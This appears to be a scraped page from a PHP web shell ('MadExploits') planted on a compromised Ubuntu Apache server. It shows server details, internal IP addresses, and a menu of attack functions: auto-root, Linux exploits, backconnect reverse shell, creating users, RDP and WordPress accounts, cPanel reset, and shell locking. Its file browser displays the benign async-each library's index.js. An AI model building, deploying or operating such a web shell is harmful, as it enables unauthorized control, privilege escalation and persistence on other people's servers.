Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
async-each /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE
1.07
KB
-rw-rw-r--
README.md
1.12
KB
-rw-rw-r--
index.js
1.33
KB
-rw-rw-r--
package.json
797
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
/*! async-each - MIT License (c) 2016 Paul Miller (paulmillr.com) */ (function (globals) { 'use strict'; var each = function (items, next, callback) { if (!Array.isArray(items)) throw new TypeError('each() expects array as first argument'); if (typeof next !== 'function') throw new TypeError('each() expects function as second argument'); if (typeof callback !== 'function') callback = Function.prototype; // no-op var total = items.length; if (total === 0) return callback(undefined, items); var transformed = new Array(total); var transformedCount = 0; var returned = false; items.forEach(function (item, index) { next(item, function (error, transformedItem) { if (returned) return; if (error) { returned = true; return callback(error); } transformed[index] = transformedItem; transformedCount += 1; // can't use index: last item could take more time if (transformedCount === total) return callback(undefined, transformed); }); }); }; if (typeof define !== 'undefined' && define.amd) { define([], function () { return each; }); // RequireJS } else if (typeof module !== 'undefined' && module.exports) { module.exports = each; // CommonJS } else { globals.asyncEach = each; // <script> } })(this);
Close